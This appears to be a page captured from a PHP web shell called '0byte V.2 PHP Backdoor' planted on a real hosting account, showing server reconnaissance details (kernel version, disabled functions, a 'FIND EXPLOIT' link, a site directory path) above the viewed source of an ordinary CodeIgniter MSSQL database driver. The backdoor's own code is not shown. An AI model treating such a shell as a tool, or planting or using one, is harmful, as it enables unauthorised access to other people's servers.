0byte V.2
PHP Backdoor

Linux 116-202-49-93.cprapid.com 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64 [ FIND EXPLOIT ]
[ MySQL: OFF ][ Curl: OFF ][ Wget: OFF ][ Perl: OFF ][ Compiler: OFF ]

Disable Function: exec,passthru,shell_exec,system

/home/vhtecindia/public_html/sample/system/database/drivers/mssql/

port)) { $this->hostname .= (DIRECTORY_SEPARATOR === '\\' ? ',' : ':').$this->port; } } // -------------------------------------------------------------------- /** * Non-persistent database connection * * @param bool $persistent * @return resource */ public function db_connect($persistent = FALSE) { $this->conn_id = ($persistent) ? mssql_pconnect($this->hostname, $this->username, $this->password) : mssql_connect($this->hostname, $this->username, $this->password); if ( ! $this->conn_id) { return FALSE; } // ---------------------------------------------------------------- // Select the DB... assuming a database name is specified in the config file if ($this->database !== '' && ! $this->db_select()) { log_message('error', 'Unable to select database: '.$this->database); return ($this->db_debug === TRUE) ? $this->display_error('db_unable_to_select', $this->database) : FALSE; } // Determine how identifiers are escaped $query = $this->query('SELECT CASE WHEN (@@OPTIONS | 256) = @@OPTIONS THEN 1 ELSE 0 END AS qi'); $query = $query->row_array(); $this->_quoted_identifier = empty($query) ? FALSE : (bool) $query['qi']; $this->_escape_char = ($this->_quoted_identifier) ? '"' : array('[', ']'); return $this->conn_id; } // -------------------------------------------------------------------- /** * Select the database * * @param string $database * @return bool */ public function db_select($database = '') { if ($database === '') { $database = $this->database; } // Note: Escaping is required in the event that the DB name // contains reserved characters. if (mssql_select_db('['.$database.']', $this->conn_id)) { $this->database = $database; $this->data_cache = array(); return TRUE; } return FALSE; } // -------------------------------------------------------------------- /** * Execute the query * * @param string $sql an SQL query * @return mixed resource if rows are returned, bool otherwise */ protected function _execute($sql) { return mssql_query($sql, $this->conn_id); } // -------------------------------------------------------------------- /** * Begin Transaction * * @return bool */ protected function _trans_begin() { return $this->simple_query('BEGIN TRAN'); } // -------------------------------------------------------------------- /** * Commit Transaction * * @return bool */ protected function _trans_commit() { return $this->simple_query('COMMIT TRAN'); } // -------------------------------------------------------------------- /** * Rollback Transaction * * @return bool */ protected function _trans_rollback() { return $this->simple_query('ROLLBACK TRAN'); } // -------------------------------------------------------------------- /** * Affected Rows * * @return int */ public function affected_rows() { return mssql_rows_affected($this->conn_id); } // -------------------------------------------------------------------- /** * Insert ID * * Returns the last id created in the Identity column. * * @return string */ public function insert_id() { $query = version_compare($this->version(), '8', '>=') ? 'SELECT SCOPE_IDENTITY() AS last_id' : 'SELECT @@IDENTITY AS last_id'; $query = $this->query($query); $query = $query->row(); return $query->last_id; } // -------------------------------------------------------------------- /** * Set client character set * * @param string $charset * @return bool */ protected function _db_set_charset($charset) { return (ini_set('mssql.charset', $charset) !== FALSE); } // -------------------------------------------------------------------- /** * Version number query string * * @return string */ protected function _version() { return "SELECT SERVERPROPERTY('ProductVersion') AS ver"; } // -------------------------------------------------------------------- /** * List table query * * Generates a platform-specific query string so that the table names can be fetched * * @param bool $prefix_limit * @return string */ protected function _list_tables($prefix_limit = FALSE) { $sql = 'SELECT '.$this->escape_identifiers('name') .' FROM '.$this->escape_identifiers('sysobjects') .' WHERE '.$this->escape_identifiers('type')." = 'U'"; if ($prefix_limit !== FALSE && $this->dbprefix !== '') { $sql .= ' AND '.$this->escape_identifiers('name')." LIKE '".$this->escape_like_str($this->dbprefix)."%' " .sprintf($this->_like_escape_str, $this->_like_escape_chr); } return $sql.' ORDER BY '.$this->escape_identifiers('name'); } // -------------------------------------------------------------------- /** * List column query * * Generates a platform-specific query string so that the column names can be fetched * * @param string $table * @return string */ protected function _list_columns($table = '') { return 'SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.Columns WHERE UPPER(TABLE_NAME) = '.$this->escape(strtoupper($table)); } // -------------------------------------------------------------------- /** * Returns an object with field data * * @param string $table * @return array */ public function field_data($table) { $sql = 'SELECT COLUMN_NAME, DATA_TYPE, CHARACTER_MAXIMUM_LENGTH, NUMERIC_PRECISION, COLUMN_DEFAULT FROM INFORMATION_SCHEMA.Columns WHERE UPPER(TABLE_NAME) = '.$this->escape(strtoupper($table)); if (($query = $this->query($sql)) === FALSE) { return FALSE; } $query = $query->result_object(); $retval = array(); for ($i = 0, $c = count($query); $i < $c; $i++) { $retval[$i] = new stdClass(); $retval[$i]->name = $query[$i]->COLUMN_NAME; $retval[$i]->type = $query[$i]->DATA_TYPE; $retval[$i]->max_length = ($query[$i]->CHARACTER_MAXIMUM_LENGTH > 0) ? $query[$i]->CHARACTER_MAXIMUM_LENGTH : $query[$i]->NUMERIC_PRECISION; $retval[$i]->default = $query[$i]->COLUMN_DEFAULT; } return $retval; } // -------------------------------------------------------------------- /** * Error * * Returns an array containing code and message of the last * database error that has occurred. * * @return array */ public function error() { // We need this because the error info is discarded by the // server the first time you request it, and query() already // calls error() once for logging purposes when a query fails. static $error = array('code' => 0, 'message' => NULL); $message = mssql_get_last_message(); if ( ! empty($message)) { $error['code'] = $this->query('SELECT @@ERROR AS code')->row()->code; $error['message'] = $message; } return $error; } // -------------------------------------------------------------------- /** * Update statement * * Generates a platform-specific update string from the supplied data * * @param string $table * @param array $values * @return string */ protected function _update($table, $values) { $this->qb_limit = FALSE; $this->qb_orderby = array(); return parent::_update($table, $values); } // -------------------------------------------------------------------- /** * Truncate statement * * Generates a platform-specific truncate string from the supplied data * * If the database does not support the TRUNCATE statement, * then this method maps to 'DELETE FROM table' * * @param string $table * @return string */ protected function _truncate($table) { return 'TRUNCATE TABLE '.$table; } // -------------------------------------------------------------------- /** * Delete statement * * Generates a platform-specific delete string from the supplied data * * @param string $table * @return string */ protected function _delete($table) { if ($this->qb_limit) { return 'WITH ci_delete AS (SELECT TOP '.$this->qb_limit.' * FROM '.$table.$this->_compile_wh('qb_where').') DELETE FROM ci_delete'; } return parent::_delete($table); } // -------------------------------------------------------------------- /** * LIMIT * * Generates a platform-specific LIMIT clause * * @param string $sql SQL Query * @return string */ protected function _limit($sql) { $limit = $this->qb_offset + $this->qb_limit; // As of SQL Server 2005 (9.0.*) ROW_NUMBER() is supported, // however an ORDER BY clause is required for it to work if (version_compare($this->version(), '9', '>=') && $this->qb_offset && ! empty($this->qb_orderby)) { $orderby = $this->_compile_order_by(); // We have to strip the ORDER BY clause $sql = trim(substr($sql, 0, strrpos($sql, $orderby))); // Get the fields to select from our subquery, so that we can avoid CI_rownum appearing in the actual results if (count($this->qb_select) === 0 OR strpos(implode(',', $this->qb_select), '*') !== FALSE) { $select = '*'; // Inevitable } else { // Use only field names and their aliases, everything else is out of our scope. $select = array(); $field_regexp = ($this->_quoted_identifier) ? '("[^\"]+")' : '(\[[^\]]+\])'; for ($i = 0, $c = count($this->qb_select); $i < $c; $i++) { $select[] = preg_match('/(?:\s|\.)'.$field_regexp.'$/i', $this->qb_select[$i], $m) ? $m[1] : $this->qb_select[$i]; } $select = implode(', ', $select); } return 'SELECT '.$select." FROM (\n\n" .preg_replace('/^(SELECT( DISTINCT)?)/i', '\\1 ROW_NUMBER() OVER('.trim($orderby).') AS '.$this->escape_identifiers('CI_rownum').', ', $sql) ."\n\n) ".$this->escape_identifiers('CI_subquery') ."\nWHERE ".$this->escape_identifiers('CI_rownum').' BETWEEN '.($this->qb_offset + 1).' AND '.$limit; } return preg_replace('/(^\SELECT (DISTINCT)?)/i','\\1 TOP '.$limit.' ', $sql); } // -------------------------------------------------------------------- /** * Insert batch statement * * Generates a platform-specific insert string from the supplied data. * * @param string $table Table name * @param array $keys INSERT keys * @param array $values INSERT values * @return string|bool */ protected function _insert_batch($table, $keys, $values) { // Multiple-value inserts are only supported as of SQL Server 2008 if (version_compare($this->version(), '10', '>=')) { return parent::_insert_batch($table, $keys, $values); } return ($this->db_debug) ? $this->display_error('db_unsupported_feature') : FALSE; } // -------------------------------------------------------------------- /** * Close DB Connection * * @return void */ protected function _close() { mssql_close($this->conn_id); } }

0byte V.2PHP Backdoor

0byte V.2
PHP Backdoor